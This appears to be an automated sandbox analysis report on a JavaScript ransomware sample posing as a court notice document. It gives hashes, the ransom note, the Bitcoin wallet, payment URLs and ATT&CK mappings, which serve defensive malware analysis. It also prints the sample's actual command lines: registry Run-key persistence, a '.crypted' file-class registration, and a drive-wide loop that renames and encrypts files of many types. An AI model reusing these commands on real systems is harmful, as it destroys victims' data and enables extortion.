aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6

General

Target

Notice_to_Appear_00614075.doc.js
Size

37KB
MD5

f84c5242741ccd7949762ca5cbb96556
SHA1

894c726e0a3e8cf3fd98690c27f885c4aa775775
SHA256

aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6
SHA512

5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71

Score

10^/10

persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\a.txt

Ransom Note

ATTENTION! All your documents, photos, databases and other important personal files were encrypted using strong RSA-1024 algorithm with a unique key. To restore your files you have to pay 0.47952 BTC (bitcoins). Please follow this manual: 1. Create Bitcoin wallet here: https://blockchain.info/wallet/new 2. Buy 0.47952 BTC with cash, using search here: https://localbitcoins.com/buy_bitcoins 3. Send 0.47952 BTC to this Bitcoin address: 16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 4. Open one of the following links in your browser to download decryptor: http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB 5. Run decryptor to restore your files. PLEASE REMEMBER: - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES. - Nobody can help you except us. - It`s useless to reinstall Windows, update antivirus software, etc. - Your files can be decrypted only after you make payment. - You can find this manual on your desktop (DECRYPT.txt).

Wallets

16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

URLs

http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

8 1676 wscript.exe

flow	pid	process
8	1676	wscript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt"	reg.exe

Modifies registry class 7 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\""	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.crypted	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Crypted	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open	reg.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

wscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1676 wrote to memory of 1500	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1500	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1500	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 916	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 916	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 916	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 760	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 760	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 760	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1892	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1892	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1892	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1092	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1092	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 1092	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 292	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 292	1676	wscript.exe	cmd.exe
PID 1676 wrote to memory of 292	1676	wscript.exe	cmd.exe
PID 1500 wrote to memory of 692	1500	cmd.exe	reg.exe
PID 1500 wrote to memory of 692	1500	cmd.exe	reg.exe
PID 1500 wrote to memory of 692	1500	cmd.exe	reg.exe
PID 916 wrote to memory of 1756	916	cmd.exe	reg.exe
PID 916 wrote to memory of 1756	916	cmd.exe	reg.exe
PID 916 wrote to memory of 1756	916	cmd.exe	reg.exe
PID 760 wrote to memory of 1176	760	cmd.exe	reg.exe
PID 760 wrote to memory of 1176	760	cmd.exe	reg.exe
PID 760 wrote to memory of 1176	760	cmd.exe	reg.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
2⤵
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\system32\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
3⤵
- Adds Run key to start application
PID:692

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
2⤵
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\system32\reg.exe
REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
3⤵
- Modifies registry class
PID:1756

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
2⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\reg.exe
REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
3⤵
- Modifies registry class
PID:1176

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
2⤵
PID:1892

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
2⤵
PID:1092

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" mxc36lc5c34xiz6wgbdwc880si5ev536hr1l)
2⤵
PID:292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a.txt
MD5
31ff92435ec51fab9b7ba2ed4c15dd3e

SHA1
696a564dde590c05ad07c16357304fe1c9b25710

SHA256
b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143

SHA512
7066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6

Download Submit
memory/292-8-0x0000000000000000-mapping.dmp

Download
memory/692-9-0x0000000000000000-mapping.dmp

Download
memory/760-5-0x0000000000000000-mapping.dmp

Download
memory/916-4-0x0000000000000000-mapping.dmp

Download
memory/1092-7-0x0000000000000000-mapping.dmp

Download
memory/1176-11-0x0000000000000000-mapping.dmp

Download
memory/1292-2-0x000007FEF7080000-0x000007FEF72FA000-memory.dmp

Filesize
2.5MB

Download
memory/1500-3-0x0000000000000000-mapping.dmp

Download
memory/1756-10-0x0000000000000000-mapping.dmp

Download
memory/1892-6-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads